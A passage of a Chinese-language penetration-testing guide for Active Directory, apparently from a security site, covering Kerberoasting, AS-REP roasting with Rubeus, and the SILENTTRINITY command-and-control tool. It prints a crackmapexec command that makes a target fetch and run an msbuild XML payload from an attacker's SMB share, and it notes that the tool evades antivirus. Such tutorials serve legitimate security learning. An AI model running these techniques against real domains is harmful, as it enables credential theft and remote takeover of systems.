欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

针对活动目录(AD)的渗透测试全攻略

来源:本站整理 作者:佚名 时间:2019-03-26 TAG: 我要投稿
攻击Kerberoasting | 工具:GetUserSPNs.py
通过标识目标列表和域控制器,有一种有效的权限提升方案是Kerberoasting,因为服务帐户在AD中已经发布了服务主体名称(SPN)。随后,任何用户都可以从SPN请求Kerberos票证(Ticket),该票证中包含该帐户对应的哈希密码(使用Kerberos 5 TGS-REP格式)。有许多不同的工具可以进行Kerberoasting,但实际上你只需要使用一个工具。
GetUserSPNs.py的功能如同它的名字,在目标域中查询在用户帐户下运行的SPN。使用它的过程非常简单。

现在,我们已经拥有一个服务帐户的哈希值。我将其加载到hashcat(GUI版本),并选择哈希类型13100,如下所示。

在几秒钟之内,就可以完成破解。

我们现在已经拥有服务帐户的凭据,借助这一凭据,我们通常就可以访问域控制器了。这台容易了吗?我们可以尝试一下其他的方式。
攻击:ASEPRoasting | 工具:Rubeus
ASEPRoasting类似于Kerberoasting,我们可以查询帐户的TGT,获取哈希值,然后对其进行破解。但如果要使用ASEPRoasting这种攻击方式,必须先禁用Kerberos身份预验证。当我们通过Kerberos AS-REQ消息请求TGT时,还需要提供使用我们的用户名和密码加密的时间戳。密钥分发中心(KDC)随后会解密时间戳,验证请求是否确实来自该用户,然后继续验证过程。这就是Kerberos的身份预验证过程,显然会给攻击者增加一个难题,因为不是KDC所以无法解密该消息。当然,这一机制是故意设置的,以防止攻击。但是,如果关闭身份预验证,我们就可以向任何返回其密码哈希值的用户发送AS-REQ。由于默认情况下启用了预验证,因此必须手动关闭。

为了利用这种攻击方式,我们要使用一个名为Rubeus的工具。Rubeus是一个滥用Kerberos的大型工具集,但是进行的是ASREPRoasting的攻击方式。要使用Rubeus,首先要安装Visual Studio。安装完成后,下载Rubeus并使用Visual Studio以打开Rubeus.sln文件。


在默认情况下,它将被安装在Rubeus\bin\Debug\目录中。我们cd进入该目录,然后运行它:
.\Rubeus.exe asreproast

如果没有用户选择“不要求Kerberos身份预验证”,那么就无法对任何用户进行攻击。但是,如果有用户…

然后,我们可以为用户获取哈希值,并进行破解。
需要注意的是,我们的示例是在已经加入域的计算机上完成的,如果是从不在域中的计算机执行此操作,则必须输入域控制器、域名、OU等内容。
工具:SILENTTRINITY
SILENTTRINITY是由byt3bl33d3r开发的一种新型命令与控制(C2)工具,它使用IronPython和C#。我们也可以选择使用MSBuild.exe,这是一个Windows二进制文件,它将构建C#代码(默认情况下也安装在Windows 10中,作为.NET的一部分),以XML格式运行命令与控制(C2)Payload,然后允许攻击者使用底层.NET框架借助IronPython、C#和其他语言在受害者的主机上进行操作。
就我个人而言,目前在我的工具包中,SILENTTRINITY已经取代了Empire。我在这里写了一篇关于如何使用Empire的指南。尽管在一些情况下,我仍喜欢使用Empire,但SILENTTRINITY还正在处于“alpha”状态,因此还有一些功能会在后续被开发。在我看来,SILENTTRINITY与Empire相比有三个主要优势。
1. Empire Payload现在已经可以被Windows Defender发现,甚至即使是混淆后的版本(存在规避的方法)。
2. SILENTTRINITY仍然处于没有被检测到的状态。
3. 使用–at-exec开关,在CME上执行Payload时,可以升级到SYSTEM权限。
下面是使用非域管理员用户凭据的全新Windows 10安装中的PoC。


我在SILENTTRINITY中生成XML Payload,然后通过smbserver.py将其托管在我的SMB服务器上。如果对具体步骤存在疑问,可以阅读我的指南。然后,我使用CME执行从攻击者计算机上获取XML文件的命令。
crackmapexec 192.168.218.60 -u tsmith -p Password! -d lab.local -x 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe  \\192.168.218.129\SMB\msbuild.xml' --exec-method atexec

上一页  [1] [2] [3] [4] [5] [6]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载